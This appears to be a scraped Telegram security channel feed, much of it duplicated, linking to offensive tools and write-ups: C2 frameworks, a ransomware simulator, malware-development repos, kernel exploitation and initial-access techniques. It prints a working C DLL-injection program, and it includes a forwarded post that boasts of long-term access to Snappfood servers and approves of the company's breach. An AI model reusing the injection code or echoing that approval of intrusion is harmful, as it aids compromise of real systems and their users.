PingRAT: secretly passes C2 traffic through firewalls using ICMP payloads
https://github.com/umutcamliyurt/PingRAT
#c2 ,#tool , #go
———
@islemolecule_source
https://github.com/umutcamliyurt/PingRAT
#c2 ,#tool , #go
———
@islemolecule_source
PSRansom: a PowerShell Ransomware Simulator with C2 Server capabilities.
https://github.com/JoelGMSec/PSRansom
#c2 , #powershell , #simulat , #tool
———
@islemolecule_source
https://github.com/JoelGMSec/PSRansom
#c2 , #powershell , #simulat , #tool
———
@islemolecule_source
TLDR; 4 new releases from @myhackerhouse
for your malware development and analysis purposes with 3 re-created from the CIA's Vault7 leak.
1. https://github.com/hackerhouse-opensource/marble
2. https://github.com/hackerhouse-opensource/WMIProcessWatcher
3. https://github.com/hackerhouse-opensource/Artillery
4. https://github.com/hackerhouse-opensource/SignToolEx
#malware_dev ,#analysis ,
———
@islemolecule_source
for your malware development and analysis purposes with 3 re-created from the CIA's Vault7 leak.
1. https://github.com/hackerhouse-opensource/marble
2. https://github.com/hackerhouse-opensource/WMIProcessWatcher
3. https://github.com/hackerhouse-opensource/Artillery
4. https://github.com/hackerhouse-opensource/SignToolEx
#malware_dev ,#analysis ,
———
@islemolecule_source
How to break bare metal firmware encryption (FortiGate firewalls) for security research.
Credits: Jon Williams (@bishopfox)
https://bishopfox.com/blog/breaking-fortinet-firmware-encryption
#firewall, #fortigate ,
———
@islemolecule_source
Credits: Jon Williams (@bishopfox)
https://bishopfox.com/blog/breaking-fortinet-firmware-encryption
#firewall, #fortigate ,
———
@islemolecule_source
Browser Extension Pentesting Methodology
credit : @hacktricks_live
https://book.hacktricks.xyz/pentesting-web/browser-extension-pentesting-methodology
#methodology
———
@islemolecule_source
credit : @hacktricks_live
https://book.hacktricks.xyz/pentesting-web/browser-extension-pentesting-methodology
#methodology
———
@islemolecule_source
Pentesting LLM apps 101
credit : @JubbaOnJeans
https://boringappsec.substack.com/p/guest-post-edition-24-pentesting
#LLM ,
———
@islemolecule_source
credit : @JubbaOnJeans
https://boringappsec.substack.com/p/guest-post-edition-24-pentesting
#LLM ,
———
@islemolecule_source
Detecting and decrypting Sliver C2 – a threat hunter’s guide
https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/
#c2 ,
———
@islemolecule_source
https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/
#c2 ,
———
@islemolecule_source
Course to get into Large Language Models (LLMs) with roadmaps and Colab notebooks.
credit: @maximelabonne
https://github.com/mlabonne/llm-course/tree/main
#LLM
———
@islemolecule_source
credit: @maximelabonne
https://github.com/mlabonne/llm-course/tree/main
#LLM
———
@islemolecule_source
Source Byte
PSRansom: a PowerShell Ransomware Simulator with C2 Server capabilities. https://github.com/JoelGMSec/PSRansom #c2 , #powershell , #simulat , #tool ——— @islemolecule_source
7k view & 150 likes on twitter, i really don't know what to say 🤷♀
Share posts plz
Share posts plz
great burpsuite series by Meraj Heydari
credit : @meraj_heydari
language : persian
https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-
#burpsuite ,
———
@islemolecule_source
credit : @meraj_heydari
language : persian
https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-
#burpsuite ,
———
@islemolecule_source
exploiting a use-after-free in Linux kernel 5.15 (Ubuntu 22.04) (CVE-2022-32250)
credit: @saidelike
research.nccgroup.com/2022/0…
#linux , #kernel , #analysis , #exploitation
__
@islemolecule_source
credit: @saidelike
research.nccgroup.com/2022/0…
#linux , #kernel , #analysis , #exploitation
__
@islemolecule_source
DLL Injection classic way
:)
1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute
#malware_dev
@islemolecule_source
:)
1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute
int main(int argc, char *argv[]) {
HANDLE processHandle;
PVOID remoteBuffer;
wchar_t dllPath[] = TEXT("C:\\experiments\\evilm64.dll");
printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
CloseHandle(processHandle);
return 0;
}
iredteam#malware_dev
@islemolecule_source
Forwarded from .....
But a few months ago, we informed Snapfood indirectly about the existence of vulnerabilities
Snapfood servers were vulnerable and we had access to jira.snappfood.ir and jira.snapp.ir,... for months and warned about them but they didn't pay attention.
In this post, we thank the elites of SnapFood
بهنام نصراللهی
مهدی شکری
سپهر رشادی
According to our and other people's warnings, we are happy about what happened to SnappFood!
Please open Telegram to view this post
VIEW IN TELEGRAM
Initial Access – search-ms URI Handler
credit : @hackerfantastic
https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/
#initial_access ,
———
@islemolecule_source
credit : @hackerfantastic
https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/
#initial_access ,
———
@islemolecule_source